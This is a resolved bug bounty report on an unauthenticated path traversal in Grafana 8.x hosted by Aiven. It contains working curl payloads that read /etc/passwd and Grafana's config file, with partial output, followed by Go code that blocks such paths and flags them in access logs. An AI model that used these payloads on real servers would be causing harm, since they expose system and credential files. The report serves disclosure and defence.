Zero day path traversal vulnerability in Grafana 8.x allows unauthenticated arbitrary local file read

High
Aiven Ltd
Submitted None
Reported by j0v

Vulnerability Details

Technical details and impact analysis

Path Traversal
## Summary:

Hi team, I've found a path traversal issue in the Grafana instances hosted on the Aiven platforms. With the path traversal it's possible for an unauthenticated user to read arbitrary files on the server.

## Steps To Reproduce:

1. Log in at https://console.aiven.io
2. Create a new Grafana instance and wait till it's up and running
3. Run the following curl command to get the content of the /etc/passwd file on the server:

```
curl https://grafana-303ca6f8-████.aivencloud.com/public/plugins/mysql/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
```

Output:

```
$ curl https://grafana-303ca6f8-███████.aivencloud.com/public/plugins/mysql/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:65534:65534:Kernel Overflow User:/:/sbin/nologin
███ █████ ██████ ██████████ ██████████ ████████ ██████
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
systemd-coredump:x:992:991:systemd Core Dumper:/:/sbin/nologin
systemd-resolve:x:193:193:systemd Resolver:/:/sbin/nologin
systemd-timesync:x:991:990:systemd Time Synchronization:/:/sbin/nologin
██████████
dbus:x:81:81:System message bus:/:/sbin/nologin
█████ ████████ ██████ █████████ ██████████ ███ ██████████ ███ █████ █████████ ██████████ ███ ███ ████ ███
```

Some other examples:

See the Grafana config:

```
curl --path-as-is https://grafana-303ca6f8-█████████.aivencloud.com/public/plugins/mysql/../../../../../../../../../../../../usr/share/grafana/conf/defaults.ini
```

I'll keep my Grafana instance running so you can try to reproduce it with the examples above.

## Impact

An unauthenticated user can get access to all system files if he knows the exact path of the file.
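The two request shapes in this report (a percent-encoded `..%2F` sequence, and a raw `../` sequence sent with `--path-as-is` so the client does not normalise it) both defeat a server that only checks the path before decoding or that never canonicalises it at all. The example below, written in Go for this page and not taken from Grafana or from the fix Grafana shipped, shows the server-side rule that closes both variants (decode, clean, then confirm the result is still under the plugin directory) and reuses the same rule as a log-side detector over a few constructed access-log lines. `ResolvePluginPath`, `LooksLikeTraversal`, `ScanAccessLog` and the sample log lines are all assumptions made for this example.

```go
package main

import (
	"errors"
	"fmt"
	"net/url"
	"path"
	"strings"
)

// ErrTraversal is returned when a request path, once decoded and cleaned,
// resolves outside the directory it is supposed to be served from.
var ErrTraversal = errors.New("path escapes the allowed base directory")

// ResolvePluginPath takes the raw request path as it appears in the HTTP
// request line (possibly with percent-encoded slashes and dots) and returns
// the cleaned, root-relative path under basePrefix, or ErrTraversal.
// Hypothetical helper written for this note; it is not Grafana's code.
func ResolvePluginPath(basePrefix, rawRequestPath string) (string, error) {
	// Step 1: percent-decode, so "%2F" becomes "/" and "%2E" becomes ".".
	// Checking the prefix before this step is exactly the mistake that lets
	// "..%2F" slip through.
	decoded, err := url.PathUnescape(rawRequestPath)
	if err != nil {
		return "", err
	}
	// Step 2: normalise. Treat backslashes like slashes and let path.Clean
	// collapse every "." and ".." segment and repeated slashes.
	decoded = strings.ReplaceAll(decoded, `\`, "/")
	cleaned := path.Clean("/" + decoded)
	// Step 3: the cleaned path must still live under the base prefix.
	base := path.Clean("/" + basePrefix)
	if cleaned != base && !strings.HasPrefix(cleaned, base+"/") {
		return "", ErrTraversal
	}
	return cleaned, nil
}

// LooksLikeTraversal is the log-side view of the same rule: a request path
// is flagged when it does not resolve to something under /public/plugins,
// whether the parent-directory references are raw, encoded or mixed.
func LooksLikeTraversal(rawRequestPath string) bool {
	_, err := ResolvePluginPath("/public/plugins", rawRequestPath)
	return err != nil
}

// ScanAccessLog returns the request paths in combined-format access-log
// lines that target /public/plugins/ but resolve outside it. Lines without
// a quoted "METHOD PATH PROTOCOL" request line are skipped.
func ScanAccessLog(lines []string) []string {
	var hits []string
	for _, line := range lines {
		parts := strings.Split(line, `"`)
		if len(parts) < 3 {
			continue
		}
		req := strings.Fields(parts[1]) // METHOD PATH PROTOCOL
		if len(req) < 2 {
			continue
		}
		if strings.HasPrefix(req[1], "/public/plugins/") && LooksLikeTraversal(req[1]) {
			hits = append(hits, req[1])
		}
	}
	return hits
}

// sampleLog is constructed for this example; the addresses and timestamps
// are placeholders, and the two traversal lines mirror the report's payloads.
var sampleLog = []string{
	`203.0.113.5 - - [01/Jan/2022:10:00:01 +0000] "GET /public/plugins/mysql/img/mysql_logo.svg HTTP/1.1" 200 2048`,
	`203.0.113.5 - - [01/Jan/2022:10:00:02 +0000] "GET /public/plugins/mysql/..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1320`,
	`203.0.113.5 - - [01/Jan/2022:10:00:03 +0000] "GET /public/plugins/mysql/../../../../../../usr/share/grafana/conf/defaults.ini HTTP/1.1" 200 40211`,
	`198.51.100.9 - - [01/Jan/2022:10:00:04 +0000] "GET /api/health HTTP/1.1" 200 53`,
}

func main() {
	for _, p := range ScanAccessLog(sampleLog) {
		fmt.Println("traversal attempt:", p)
	}
}
```

Note that the check runs on the cleaned path and compares against `base+"/"`, not just `base`: without the trailing slash, a request under `/public/plugins-other/` would pass a bare prefix test. A 200 response on a flagged line is the signal that matters in the log; a 404 means the check above (or an equivalent one) already held.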

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Bounty

$1000.00

Submitted

Weakness

Path Traversal